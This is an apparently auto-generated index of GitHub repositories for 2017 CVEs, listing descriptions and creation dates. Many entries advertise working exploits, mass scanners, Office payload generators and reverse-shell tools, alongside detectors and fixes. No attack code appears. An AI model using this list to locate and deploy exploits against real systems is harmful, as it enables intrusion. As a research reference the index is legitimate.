**CVE-2017-5638** : [Aasron/Struts2-045-Exp](https://api.github.com/repos/Aasron/Struts2-045-Exp) create time: 2017-05-27T02:03:28Z

**An exploit (and library) for CVE-2017-5638 - Apache Struts2 S2-045 bug.** : [jpacora/Struts2Shell](https://api.github.com/repos/jpacora/Struts2Shell) create time: 2017-05-28T06:44:13Z

**None** : [homjxi0e/CVE-2017-1000367](https://api.github.com/repos/homjxi0e/CVE-2017-1000367) create time: 2017-06-04T12:31:59Z

**None** : [c0d3z3r0/sudo-CVE-2017-1000367](https://api.github.com/repos/c0d3z3r0/sudo-CVE-2017-1000367) create time: 2017-05-30T18:12:38Z

**None** : [AndreasKl/CVE-2017-5638](https://api.github.com/repos/AndreasKl/CVE-2017-5638) create time: 2017-06-05T20:11:06Z

**None** : [shaheemirza/CVE-2017-0213-](https://api.github.com/repos/shaheemirza/CVE-2017-0213-) create time: 2017-06-29T18:49:44Z

**None** : [homjxi0e/CVE-2017-7472](https://api.github.com/repos/homjxi0e/CVE-2017-7472) create time: 2017-06-08T03:47:57Z

**None** : [homjxi0e/CVE-2017-2671](https://api.github.com/repos/homjxi0e/CVE-2017-2671) create time: 2017-06-08T04:28:31Z

**Struts-RCE CVE-2017-5638** : [riyazwalikar/struts-rce-cve-2017-5638](https://api.github.com/repos/riyazwalikar/struts-rce-cve-2017-5638) create time: 2017-06-08T05:22:31Z

**None** : [homjxi0e/CVE-2017-9430](https://api.github.com/repos/homjxi0e/CVE-2017-9430) create time: 2017-06-08T06:22:37Z

**own implementation of the CVE-2017-1000367 sudo privilege escalation vulnerability in python** : [pucerpocok/sudo_exploit](https://api.github.com/repos/pucerpocok/sudo_exploit) create time: 2017-06-08T08:37:38Z

**None** : [homjxi0e/CVE-2017-5638](https://api.github.com/repos/homjxi0e/CVE-2017-5638) create time: 2017-06-08T21:47:11Z

**Wordpress Username Enumeration /CVE-2017-5487,WordPress < 4.7.1 - ** : [teambugsbunny/wpUsersScan](https://api.github.com/repos/teambugsbunny/wpUsersScan) create time: 2017-10-22T09:22:28Z

**CVE-2017-5638 Test environment** : [eeehit/CVE-2017-5638](https://api.github.com/repos/eeehit/CVE-2017-5638) create time: 2017-06-13T06:59:15Z

**None** : [Houl777/CVE-2017-9606](https://api.github.com/repos/Houl777/CVE-2017-9606) create time: 2017-06-14T04:30:36Z

**InSpec profile to verify a node is patched and compliant for CVE-2017-8543** : [americanhanko/windows-security-cve-2017-8543](https://api.github.com/repos/americanhanko/windows-security-cve-2017-8543) create time: 2017-06-19T00:15:09Z

**BlackCat-CMS-Bundle-v1.2 Cross Site Scripting(XSS) Assigned CVE Number: CVE-2017-9609** : [faizzaidi/Blackcat-cms-v1.2-xss-POC-by-Provensec-llc](https://api.github.com/repos/faizzaidi/Blackcat-cms-v1.2-xss-POC-by-Provensec-llc) create time: 2017-06-21T09:30:58Z

**None** : [homjxi0e/CVE-2017-3078](https://api.github.com/repos/homjxi0e/CVE-2017-3078) create time: 2017-06-26T09:34:59Z

**None** : [sUbc0ol/Microsoft-Word-CVE-2017-0199-](https://api.github.com/repos/sUbc0ol/Microsoft-Word-CVE-2017-0199-) create time: 2017-06-30T09:08:40Z

**None** : [sUbc0ol/Detection-for-CVE-2017-2793](https://api.github.com/repos/sUbc0ol/Detection-for-CVE-2017-2793) create time: 2017-06-30T09:32:42Z

**None** : [sUbc0ol/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner](https://api.github.com/repos/sUbc0ol/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner) create time: 2017-06-30T09:40:31Z

**None** : [sUbc0ol/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638](https://api.github.com/repos/sUbc0ol/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638) create time: 2017-06-30T09:55:41Z

**CVE-2017-0213 for command line** : [zcgonvh/CVE-2017-0213](https://api.github.com/repos/zcgonvh/CVE-2017-0213) create time: 2017-07-01T16:07:04Z

**None** : [homjxi0e/tool-New-my-CVE-2017](https://api.github.com/repos/homjxi0e/tool-New-my-CVE-2017) create time: 2017-06-13T23:43:08Z

**Apache struts struts 2 048, CVE-2017-9791.** : [IanSmith123/s2-048](https://api.github.com/repos/IanSmith123/s2-048) create time: 2017-07-07T12:35:55Z

**CVE-2017-9791** : [dragoneeg/Struts2-048](https://api.github.com/repos/dragoneeg/Struts2-048) create time: 2017-07-07T18:27:31Z

**None** : [homjxi0e/CVE-2017-4490-](https://api.github.com/repos/homjxi0e/CVE-2017-4490-) create time: 2017-05-02T04:21:46Z

**None** : [homjxi0e/CVE-2017-4490-install-Script-Python-in-Terminal-](https://api.github.com/repos/homjxi0e/CVE-2017-4490-install-Script-Python-in-Terminal-) create time: 2017-07-07T20:21:51Z

**POC for java RMI deserialization vulnerability** : [xfei3/CVE-2017-3241-POC](https://api.github.com/repos/xfei3/CVE-2017-3241-POC) create time: 2017-07-04T13:05:46Z

**None** : [liusec/CVE-2017-7529](https://api.github.com/repos/liusec/CVE-2017-7529) create time: 2017-07-19T09:55:42Z

**Exploit created by: R4v3nBl4ck end Pacman** : [R4v3nBl4ck/Apache-Struts-2-CVE-2017-5638-Exploit-](https://api.github.com/repos/R4v3nBl4ck/Apache-Struts-2-CVE-2017-5638-Exploit-) create time: 2017-07-24T05:05:28Z

**Proof-of-Concept exploit for CVE-2017-7494(Samba RCE from a writable share)** : [betab0t/cve-2017-7494](https://api.github.com/repos/betab0t/cve-2017-7494) create time: 2017-05-25T13:20:56Z

**CVE-2017-5689 Proof-of-Concept exploit** : [embedi/amt_auth_bypass_poc](https://api.github.com/repos/embedi/amt_auth_bypass_poc) create time: 2017-07-27T21:06:08Z

**This is an exploit for CVE-2017-7047, Works on 10.3.2 and below.** : [q1f3/Triple_fetch](https://api.github.com/repos/q1f3/Triple_fetch) create time: 2017-08-10T11:24:47Z

**Attempt to steal kernelcredentials from launchd + task_t pointer (Based on: CVE-2017-7047)** : [JosephShenton/Triple_Fetch-Kernel-Creds](https://api.github.com/repos/JosephShenton/Triple_Fetch-Kernel-Creds) create time: 2017-08-05T03:23:13Z

**this tool can generate a exp for cve-2017-8486, it is developed by python** : [Securitykid/CVE-2017-8464-exp-generator](https://api.github.com/repos/Securitykid/CVE-2017-8464-exp-generator) create time: 2017-08-07T11:56:11Z

**Proof of concept of CVE-2017-1000117** : [timwr/CVE-2017-1000117](https://api.github.com/repos/timwr/CVE-2017-1000117) create time: 2017-08-11T07:03:23Z

**poc for cve-2017-10661** : [GeneBlue/CVE-2017-10661_POC](https://api.github.com/repos/GeneBlue/CVE-2017-10661_POC) create time: 2017-08-11T10:45:10Z

**Repo to test the new git vulnerability** : [GrahamMThomas/test-git-vuln_CVE-2017-1000117](https://api.github.com/repos/GrahamMThomas/test-git-vuln_CVE-2017-1000117) create time: 2017-08-11T18:05:01Z

**None** : [Manouchehri/CVE-2017-1000117](https://api.github.com/repos/Manouchehri/CVE-2017-1000117) create time: 2017-08-11T20:47:53Z

**test** : [alilangtest/CVE-2017-1000117](https://api.github.com/repos/alilangtest/CVE-2017-1000117) create time: 2017-08-12T14:14:55Z

**None** : [VulApps/CVE-2017-1000117](https://api.github.com/repos/VulApps/CVE-2017-1000117) create time: 2017-08-12T18:20:02Z

**None** : [sm-paul-schuette/CVE-2017-12426](https://api.github.com/repos/sm-paul-schuette/CVE-2017-12426) create time: 2017-08-14T12:18:15Z

**None** : [sasairc/CVE-2017-1000117_wasawasa](https://api.github.com/repos/sasairc/CVE-2017-1000117_wasawasa) create time: 2017-08-15T08:39:23Z

**CVE-2017-1000117** : [rootclay/CVE-2017-1000117](https://api.github.com/repos/rootclay/CVE-2017-1000117) create time: 2017-08-16T03:52:27Z

**https://github.com/greymd/CVE-2017-1000117 の勉強用** : [bells17/CVE-2017-1000117](https://api.github.com/repos/bells17/CVE-2017-1000117) create time: 2017-08-16T02:04:02Z

**Experiment of CVE-2017-1000117** : [ieee0824/CVE-2017-1000117-sl](https://api.github.com/repos/ieee0824/CVE-2017-1000117-sl) create time: 2017-08-16T04:01:08Z

**None** : [ieee0824/CVE-2017-1000117](https://api.github.com/repos/ieee0824/CVE-2017-1000117) create time: 2017-08-16T02:05:08Z

**Check Git's vulnerability CVE-2017-1000117** : [greymd/CVE-2017-1000117](https://api.github.com/repos/greymd/CVE-2017-1000117) create time: 2017-08-14T15:05:48Z

**CVE-2017-2388: Null-pointer dereference in IOFireWireFamily.** : [bazad/IOFireWireFamily-null-deref](https://api.github.com/repos/bazad/IOFireWireFamily-null-deref) create time: 2017-08-04T19:35:20Z

**None** : [ikmski/CVE-2017-1000117](https://api.github.com/repos/ikmski/CVE-2017-1000117) create time: 2017-08-17T00:37:47Z

**None** : [shogo82148/Fix-CVE-2017-1000117](https://api.github.com/repos/shogo82148/Fix-CVE-2017-1000117) create time: 2017-08-15T01:40:18Z

**None** : [takehaya/CVE-2017-1000117](https://api.github.com/repos/takehaya/CVE-2017-1000117) create time: 2017-08-16T14:34:37Z

**CVE-2017-1000117の検証** : [Shadow5523/CVE-2017-1000117-test](https://api.github.com/repos/Shadow5523/CVE-2017-1000117-test) create time: 2017-08-15T12:24:57Z

**CVE-2017-2368 VCF Message App Crash Bug** : [vincedes3/CVE-2017-2368](https://api.github.com/repos/vincedes3/CVE-2017-2368) create time: 2017-08-18T09:33:57Z

**GitのCommand Injectionの脆弱性を利用してスクリプトを落として実行する例** : [nkoneko/CVE-2017-1000117](https://api.github.com/repos/nkoneko/CVE-2017-1000117) create time: 2017-08-18T16:23:53Z

**test for CVE-2017-1000117** : [chenzhuo0618/test](https://api.github.com/repos/chenzhuo0618/test) create time: 2017-08-21T07:46:16Z

**NexusPHP CSRF+XSS** : [ZZS2017/cve-2017-12792](https://api.github.com/repos/ZZS2017/cve-2017-12792) create time: 2017-10-16T07:06:19Z

**There is a classic heap overflow when eval a string which large enough in Chakra! This issue can be reproduced steadly in uptodate Edge in Win10 WIP. An exception will occur immediatly when opening POC.html in Edge. ** : [homjxi0e/CVE-2017-8641_chakra_Js_GlobalObject](https://api.github.com/repos/homjxi0e/CVE-2017-8641_chakra_Js_GlobalObject) create time: 2017-08-21T20:11:11Z

**None** : [TamiiLambrado/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner](https://api.github.com/repos/TamiiLambrado/Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner) create time: 2017-08-24T07:36:14Z

**WolfCMS-v0.8.3.1 Cross Site Scripting(XSS) Assigned CVE Number: CVE-2017-11611** : [faizzaidi/Wolfcms-v0.8.3.1-xss-POC-by-Provensec-llc](https://api.github.com/repos/faizzaidi/Wolfcms-v0.8.3.1-xss-POC-by-Provensec-llc) create time: 2017-08-25T03:19:05Z

**Bypass Feature UMCI in Internet Explorer** : [homjxi0e/CVE-2017-8625_Bypass_UMCI](https://api.github.com/repos/homjxi0e/CVE-2017-8625_Bypass_UMCI) create time: 2017-08-21T20:14:07Z

**None** : [Xhendos/CVE-2017-5638](https://api.github.com/repos/Xhendos/CVE-2017-5638) create time: 2017-08-12T23:00:14Z

**None** : [thelastbyte/CVE-2017-1000117](https://api.github.com/repos/thelastbyte/CVE-2017-1000117) create time: 2017-08-12T01:10:49Z

**None** : [siling2017/CVE-2017-1000117](https://api.github.com/repos/siling2017/CVE-2017-1000117) create time: 2017-09-04T04:18:19Z

**cve -2017-9805** : [hahwul/struts2-rce-cve-2017-9805-ruby](https://api.github.com/repos/hahwul/struts2-rce-cve-2017-9805-ruby) create time: 2017-09-07T08:49:14Z

**A simple script for exploit RCE for Struts 2 S2-053(CVE-2017-12611)** : [brianwrf/S2-053-CVE-2017-12611](https://api.github.com/repos/brianwrf/S2-053-CVE-2017-12611) create time: 2017-09-08T02:50:37Z

**An exploit for Apache Struts CVE-2017-9805** : [Lone-Ranger/apache-struts-pwn_CVE-2017-9805](https://api.github.com/repos/Lone-Ranger/apache-struts-pwn_CVE-2017-9805) create time: 2017-09-10T05:26:03Z

**Automatic execution Payload From Windows By Path Users All Exploit Via File bashrc ** : [homjxi0e/CVE-2017-9779](https://api.github.com/repos/homjxi0e/CVE-2017-9779) create time: 2017-08-18T18:30:42Z

**None** : [zzz66686/CVE-2017-14262](https://api.github.com/repos/zzz66686/CVE-2017-14262) create time: 2017-09-08T02:59:21Z

**None** : [zzz66686/CVE-2017-14263](https://api.github.com/repos/zzz66686/CVE-2017-14263) create time: 2017-09-08T07:27:13Z

**None** : [tahisaad6/CVE-2017-8759-Exploit-sample2](https://api.github.com/repos/tahisaad6/CVE-2017-8759-Exploit-sample2) create time: 2017-09-13T20:31:43Z

**CVE-2017-8759 - A vulnerability in the SOAP WDSL parser.** : [vysecurity/CVE-2017-8759](https://api.github.com/repos/vysecurity/CVE-2017-8759) create time: 2017-09-13T17:10:18Z

**None** : [theguly/CVE-2017-14105](https://api.github.com/repos/theguly/CVE-2017-14105) create time: 2017-09-01T14:51:31Z

**CVE-2017-8759 Research** : [BasuCert/CVE-2017-8759](https://api.github.com/repos/BasuCert/CVE-2017-8759) create time: 2017-09-13T20:27:29Z

**Struts 2 web app that is vulnerable to CVE-2017-98505 and CVE-2017-5638** : [mike-williams/Struts2Vuln](https://api.github.com/repos/mike-williams/Struts2Vuln) create time: 2017-09-13T09:01:34Z

**detection for Apache Struts recon and compromise ** : [initconf/CVE-2017-5638_struts](https://api.github.com/repos/initconf/CVE-2017-5638_struts) create time: 2017-03-11T14:30:02Z

**None** : [homjxi0e/CVE-2017-7912_Sneak](https://api.github.com/repos/homjxi0e/CVE-2017-7912_Sneak) create time: 2017-09-16T12:27:48Z

**Simple C# implementation of CVE-2017-8759** : [JonasUliana/CVE-2017-8759](https://api.github.com/repos/JonasUliana/CVE-2017-8759) create time: 2017-09-17T22:05:56Z

**CVE-2017-8759** : [Securitykid/CVE-2017-8759](https://api.github.com/repos/Securitykid/CVE-2017-8759) create time: 2017-09-18T05:35:57Z

**Checks a shared hosting environment for CVE-2017-9798** : [nitrado/CVE-2017-9798](https://api.github.com/repos/nitrado/CVE-2017-9798) create time: 2017-09-18T15:17:13Z

**Two versions of CVE-2017-8759 exploits** : [ashr/CVE-2017-8759-exploits](https://api.github.com/repos/ashr/CVE-2017-8759-exploits) create time: 2017-09-19T06:12:10Z

**None** : [viethdgit/CVE-2017-0199](https://api.github.com/repos/viethdgit/CVE-2017-0199) create time: 2017-09-19T12:38:47Z

**NCC Group's analysis and exploitation of CVE-2017-8759 along with further refinements** : [nccgroup/CVE-2017-8759](https://api.github.com/repos/nccgroup/CVE-2017-8759) create time: 2017-09-13T15:24:10Z

**CVE-2017-9798** : [pabloec20/optionsbleed](https://api.github.com/repos/pabloec20/optionsbleed) create time: 2017-09-20T18:44:17Z

**None** : [Elm0D/CVE-2017-8464](https://api.github.com/repos/Elm0D/CVE-2017-8464) create time: 2016-02-24T17:36:29Z

**CVE-2017-8759 Remote Code Execution Vulnerability On SOAP WDSL - Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 3.5** : [homjxi0e/CVE-2017-8759_-SOAP_WSDL](https://api.github.com/repos/homjxi0e/CVE-2017-8759_-SOAP_WSDL) create time: 2017-09-14T06:20:28Z

**Broadpwn bug (CVE-2017-9417)** : [mailinneberg/Broadpwn](https://api.github.com/repos/mailinneberg/Broadpwn) create time: 2017-07-29T22:23:34Z

**CVE-2017-0785: BlueBorne PoC** : [aymankhalfatni/CVE-2017-0785](https://api.github.com/repos/aymankhalfatni/CVE-2017-0785) create time: 2017-09-22T20:33:12Z

**CVE-2017-0785 BlueBorne PoC** : [Alfa100001/-CVE-2017-0785-BlueBorne-PoC](https://api.github.com/repos/Alfa100001/-CVE-2017-0785-BlueBorne-PoC) create time: 2017-09-22T22:03:40Z

**Blueborne CVE-2017-0785 Android information leak vulnerability** : [ojasookert/CVE-2017-0785](https://api.github.com/repos/ojasookert/CVE-2017-0785) create time: 2017-09-20T23:32:29Z

**None** : [l0n3rs/CVE-2017-9798](https://api.github.com/repos/l0n3rs/CVE-2017-9798) create time: 2017-09-24T06:51:32Z

**None** : [l0n3rs/CVE-2017-8759](https://api.github.com/repos/l0n3rs/CVE-2017-8759) create time: 2017-09-24T06:58:55Z

**Utility to derive the shared secret on a JitBit Helpdesk install which can be used for authentication bypass (CVE-2017-18486)** : [Kc57/JitBit_Helpdesk_Auth_Bypass](https://api.github.com/repos/Kc57/JitBit_Helpdesk_Auth_Bypass) create time: 2017-09-26T17:51:01Z

**An Ubuntu 16.04 VM Vulnerable to CVE 2017-5638** : [evolvesecurity/vuln-struts2-vm](https://api.github.com/repos/evolvesecurity/vuln-struts2-vm) create time: 2017-09-26T17:36:21Z

**clone** : [tlatkdgus1/blueborne-CVE-2017-1000251](https://api.github.com/repos/tlatkdgus1/blueborne-CVE-2017-1000251) create time: 2017-09-28T02:12:57Z

**Check for Struts Vulnerability CVE-2017-5638** : [invisiblethreat/strutser](https://api.github.com/repos/invisiblethreat/strutser) create time: 2017-09-25T00:40:57Z

**CVE-2017-12943** : [aymankhalfatni/D-Link](https://api.github.com/repos/aymankhalfatni/D-Link) create time: 2017-09-29T12:18:40Z

**just a python script for cve-2017-12615** : [mefulton/cve-2017-12615](https://api.github.com/repos/mefulton/cve-2017-12615) create time: 2017-09-25T11:53:02Z

**None** : [own2pwn/blueborne-CVE-2017-1000251-POC](https://api.github.com/repos/own2pwn/blueborne-CVE-2017-1000251-POC) create time: 2017-10-01T10:15:40Z

**SPRING DATA REST CVE-2017-8046 DEMO** : [Soontao/CVE-2017-8046-DEMO](https://api.github.com/repos/Soontao/CVE-2017-8046-DEMO) create time: 2017-10-01T04:52:24Z

**None** : [billa3283/CVE-2017-0213](https://api.github.com/repos/billa3283/CVE-2017-0213) create time: 2017-10-01T13:29:59Z

**this script is used for hack bluetooth devices CVE 2017 0785 which was done by ARMIS This File is password protected for password contact [email protected]** : [Hackerscript/BlueBorne-CVE-2017-0785](https://api.github.com/repos/Hackerscript/BlueBorne-CVE-2017-0785) create time: 2017-10-02T18:21:43Z

**Webkit uxss exploit (CVE-2017-7089)** : [Bo0oM/CVE-2017-7089](https://api.github.com/repos/Bo0oM/CVE-2017-7089) create time: 2017-10-03T12:13:43Z

**Support x86 and x64** : [3gstudent/CVE-2017-8464-EXP](https://api.github.com/repos/3gstudent/CVE-2017-8464-EXP) create time: 2017-08-02T02:14:37Z

**Blueborne CVE-2017-0781 Android heap overflow vulnerability** : [ojasookert/CVE-2017-0781](https://api.github.com/repos/ojasookert/CVE-2017-0781) create time: 2017-10-09T15:13:25Z

**Hidden AP with Deterministic Credentials** : [wiire-a/CVE-2017-9476](https://api.github.com/repos/wiire-a/CVE-2017-9476) create time: 2017-10-10T11:25:36Z

**CVE-2017-12617 and CVE-2017-12615 for tomcat server** : [zi0Black/POC-CVE-2017-12615-or-CVE-2017-12717](https://api.github.com/repos/zi0Black/POC-CVE-2017-12615-or-CVE-2017-12717) create time: 2017-10-06T22:04:23Z

**Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution ** : [cyberheartmi9/CVE-2017-12617](https://api.github.com/repos/cyberheartmi9/CVE-2017-12617) create time: 2017-10-05T23:41:52Z

**Exploit Safari CVE-2017-7089** : [aymankhalfatni/Safari_Mac](https://api.github.com/repos/aymankhalfatni/Safari_Mac) create time: 2017-10-11T15:09:45Z

** Denial of service by Exit in Terminal !! ** : [homjxi0e/CVE-2017-7998](https://api.github.com/repos/homjxi0e/CVE-2017-7998) create time: 2017-08-23T08:17:10Z

**Blueborne CVE-2017-1000251 PoC for linux machines** : [hayzamjs/Blueborne-CVE-2017-1000251](https://api.github.com/repos/hayzamjs/Blueborne-CVE-2017-1000251) create time: 2017-09-23T06:29:31Z

**None** : [homjxi0e/CVE-2017-9999_bypassing_General_Firefox](https://api.github.com/repos/homjxi0e/CVE-2017-9999_bypassing_General_Firefox) create time: 2017-10-11T17:54:50Z

**None** : [lr3800/CVE-2017-11816](https://api.github.com/repos/lr3800/CVE-2017-11816) create time: 2017-10-13T07:05:55Z

**Tomcat 远程代码执行漏洞 Exploit** : [BeyondCy/CVE-2017-12615](https://api.github.com/repos/BeyondCy/CVE-2017-12615) create time: 2017-11-28T02:51:16Z

**Simple PowerShell script to check whether a computer is using an Infineon TPM chip that is vulnerable to CVE-2017-15361.** : [lva/Infineon-CVE-2017-15361](https://api.github.com/repos/lva/Infineon-CVE-2017-15361) create time: 2017-10-17T14:07:45Z

**test the CVE-2017-12852 in numpy v1.13.1 and v1.13.3 has fixed the bug ** : [BT123/numpy-1.13.1](https://api.github.com/repos/BT123/numpy-1.13.1) create time: 2017-09-30T05:21:48Z

**Windows tool that analyzes your computer for Infineon TPM weak RSA keys (CVE-2017-15361) ** : [jnpuskar/RocaCmTest](https://api.github.com/repos/jnpuskar/RocaCmTest) create time: 2017-10-19T13:42:52Z

**CVE-2017-9805 - Exploit** : [BeyondCy/S2-052](https://api.github.com/repos/BeyondCy/S2-052) create time: 2017-11-28T02:46:07Z

**CVE-2017-5721 Proof-of-Concept** : [embedi/smm_usbrt_poc](https://api.github.com/repos/embedi/smm_usbrt_poc) create time: 2017-10-23T11:00:18Z

**Go package that checks if RSA keys are vulnerable to ROCA / CVE-2017-15361** : [titanous/rocacheck](https://api.github.com/repos/titanous/rocacheck) create time: 2017-10-17T17:08:22Z

**Reimplementation of CVE-2017-15361 checker in C** : [0xxon/roca](https://api.github.com/repos/0xxon/roca) create time: 2017-10-25T15:16:11Z

**None** : [Winter3un/cve_2017_0199](https://api.github.com/repos/Winter3un/cve_2017_0199) create time: 2017-10-29T13:03:01Z

**None** : [Winter3un/cve_2017_8759](https://api.github.com/repos/Winter3un/cve_2017_8759) create time: 2017-10-29T13:12:04Z

**None** : [skyformat99/dnsmasq-2.4.1-fix-CVE-2017-14491](https://api.github.com/repos/skyformat99/dnsmasq-2.4.1-fix-CVE-2017-14491) create time: 2017-10-30T14:02:52Z

**None** : [angeloanatrella86/CVE-2017](https://api.github.com/repos/angeloanatrella86/CVE-2017) create time: 2017-10-28T13:47:21Z

**linux kernel exploit ** : [FloatingGuy/CVE-2017-5123](https://api.github.com/repos/FloatingGuy/CVE-2017-5123) create time: 2017-10-31T03:35:31Z

**SambaCry exploit and vulnerable container (CVE-2017-7494)** : [opsxcq/exploit-CVE-2017-7494](https://api.github.com/repos/opsxcq/exploit-CVE-2017-7494) create time: 2017-05-26T00:58:25Z

**Demo-ing CVE-2017-1000253 in a container** : [RicterZ/PIE-Stack-Clash-CVE-2017-1000253](https://api.github.com/repos/RicterZ/PIE-Stack-Clash-CVE-2017-1000253) create time: 2018-06-18T15:22:01Z

**tomcat-put-cve-2017-12615** : [wsg00d/cve-2017-12615](https://api.github.com/repos/wsg00d/cve-2017-12615) create time: 2017-11-01T16:05:32Z

**Exploit for the linux kernel vulnerability CVE-2017-5123** : [0x5068656e6f6c/CVE-2017-5123](https://api.github.com/repos/0x5068656e6f6c/CVE-2017-5123) create time: 2017-11-03T02:52:26Z

**RTF de-obfuscator for CVE-2017-0199 documents to find URLs statically.** : [nicpenning/RTF-Cleaner](https://api.github.com/repos/nicpenning/RTF-Cleaner) create time: 2017-11-03T16:47:16Z

**Unrestricted file upload vulnerability - Web Viewer 1.0.0.193 on Samsung SRN-1670D** : [realistic-security/CVE-2017-16524](https://api.github.com/repos/realistic-security/CVE-2017-16524) create time: 2017-11-05T13:32:43Z

**An exploit for Apache Struts CVE-2017-9805** : [mazen160/struts-pwn_CVE-2017-9805](https://api.github.com/repos/mazen160/struts-pwn_CVE-2017-9805) create time: 2017-09-09T01:32:57Z

**This is the Apache Struts CVE-2017-5638 struts 2 vulnerability. The same CVE that resulted in the equifax database breach.** : [donaldashdown/Common-Vulnerability-and-Exploit](https://api.github.com/repos/donaldashdown/Common-Vulnerability-and-Exploit) create time: 2017-10-30T05:21:53Z

**Proof of concept exploit script for CVE-2017-1000250. Written while researching for the essay in TTM4137 Wireless Security.** : [olav-st/CVE-2017-1000250-PoC](https://api.github.com/repos/olav-st/CVE-2017-1000250-PoC) create time: 2017-11-12T18:18:52Z

**Python exploit for CVE-2017-16806** : [rickoooooo/ulteriusExploit](https://api.github.com/repos/rickoooooo/ulteriusExploit) create time: 2017-11-13T22:48:46Z

**Chrome < 62 uxss exploit (CVE-2017-5124)** : [Bo0oM/CVE-2017-5124](https://api.github.com/repos/Bo0oM/CVE-2017-5124) create time: 2017-11-13T21:33:55Z

**CVE-2017-13089** : [mzeyong/CVE-2017-13089](https://api.github.com/repos/mzeyong/CVE-2017-13089) create time: 2017-11-15T08:22:58Z

**None** : [bloomer1016/2017-11-17-Maldoc-Using-CVE-2017-0199](https://api.github.com/repos/bloomer1016/2017-11-17-Maldoc-Using-CVE-2017-0199) create time: 2017-11-17T20:00:29Z

**None** : [zhouat/cve-2017-11882](https://api.github.com/repos/zhouat/cve-2017-11882) create time: 2017-11-19T14:57:41Z

**Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.** : [bhdresh/CVE-2017-0199](https://api.github.com/repos/bhdresh/CVE-2017-0199) create time: 2017-04-17T08:10:07Z

**Script criado para exploração em massa [CVE - 2017-16894]** : [H3dI/ENV-Mass-Exploit](https://api.github.com/repos/H3dI/ENV-Mass-Exploit) create time: 2017-12-12T22:59:45Z

**Suite de herramientas que sacan partido del CVE-2017-9097 (+RCE)** : [MDudek-ICS/AntiWeb_testing-Suite](https://api.github.com/repos/MDudek-ICS/AntiWeb_testing-Suite) create time: 2018-01-02T11:28:40Z

**This is a Metasploit module which exploits CVE-2017-11882 using the POC released here : https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about.** : [0x09AL/CVE-2017-11882-metasploit](https://api.github.com/repos/0x09AL/CVE-2017-11882-metasploit) create time: 2017-11-21T18:17:28Z

**CVE-2017-11882** : [HZachev/ABC](https://api.github.com/repos/HZachev/ABC) create time: 2017-11-21T21:07:57Z

**None** : [Grey-Li/CVE-2017-11882](https://api.github.com/repos/Grey-Li/CVE-2017-11882) create time: 2017-11-22T04:53:44Z

**CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版)** : [sevck/CVE-2017-12149](https://api.github.com/repos/sevck/CVE-2017-12149) create time: 2017-11-21T10:48:24Z

**CVE-2017-11882 File Generator PoC** : [BlackMathIT/2017-11882_Generator](https://api.github.com/repos/BlackMathIT/2017-11882_Generator) create time: 2017-11-21T09:15:28Z

**CVE-2017-9430 Fix** : [j0lama/Dnstracer-1.9-Fix](https://api.github.com/repos/j0lama/Dnstracer-1.9-Fix) create time: 2017-11-22T09:19:53Z

**# CVE-2017-11882-metasploit This is a Metasploit module which exploits CVE-2017-11882 using the POC below: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about. ## Installation 1) Copy the cve_2017_11882.rb to /usr/share/metasploit-framework/modules/exploits/windows/local/ 2) Copy the cve-2017-11882.rtf to /usr/share/metasploit-framework/data/exploits/ This module is a quick port to Metasploit and uses mshta.exe to execute the payload. There are better ways to implement this module and exploit but will update it as soon as I have the time.** : [legendsec/CVE-2017-11882-for-Kali](https://api.github.com/repos/legendsec/CVE-2017-11882-for-Kali) create time: 2017-11-24T07:11:13Z

**None** : [CSC-pentest/cve-2017-11882](https://api.github.com/repos/CSC-pentest/cve-2017-11882) create time: 2017-11-24T10:09:49Z

**None** : [sudosammy/CVE-2017-15394](https://api.github.com/repos/sudosammy/CVE-2017-15394) create time: 2017-11-26T15:32:04Z

**None** : [Shadowshusky/CVE-2017-11882-](https://api.github.com/repos/Shadowshusky/CVE-2017-11882-) create time: 2017-11-27T01:50:44Z

**CVE-2017-11882 exploitation** : [starnightcyber/CVE-2017-11882](https://api.github.com/repos/starnightcyber/CVE-2017-11882) create time: 2017-11-22T01:11:39Z

**CVE-2017-11882 from https://github.com/embedi/CVE-2017-11882** : [Ridter/CVE-2017-11882](https://api.github.com/repos/Ridter/CVE-2017-11882) create time: 2017-11-21T05:55:53Z

**Proof-of-Concept exploits for CVE-2017-11882** : [embedi/CVE-2017-11882](https://api.github.com/repos/embedi/CVE-2017-11882) create time: 2017-11-20T16:35:30Z

**A POC for the Huge Dirty Cow vulnerability (CVE-2017-1000405)** : [bindecy/HugeDirtyCowPOC](https://api.github.com/repos/bindecy/HugeDirtyCowPOC) create time: 2017-11-29T22:19:51Z

**None** : [giovannidispoto/CVE-2017-13872-Patch](https://api.github.com/repos/giovannidispoto/CVE-2017-13872-Patch) create time: 2017-11-30T08:22:00Z

**None** : [Q2h1Cg/CVE-2017-1000117](https://api.github.com/repos/Q2h1Cg/CVE-2017-1000117) create time: 2017-12-03T08:58:18Z

**CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum.** : [unamer/CVE-2017-11882](https://api.github.com/repos/unamer/CVE-2017-11882) create time: 2017-11-21T15:22:41Z

**Safari XSS (CVE-2017-7038) https://support.apple.com/en-us/HT207923** : [ansjdnakjdnajkd/CVE-2017-7038](https://api.github.com/repos/ansjdnakjdnajkd/CVE-2017-7038) create time: 2017-12-06T15:31:08Z

**CVE-2017-13868: Information leak of uninitialized kernel heap data in XNU.** : [bazad/ctl_ctloutput-leak](https://api.github.com/repos/bazad/ctl_ctloutput-leak) create time: 2017-10-07T09:42:05Z

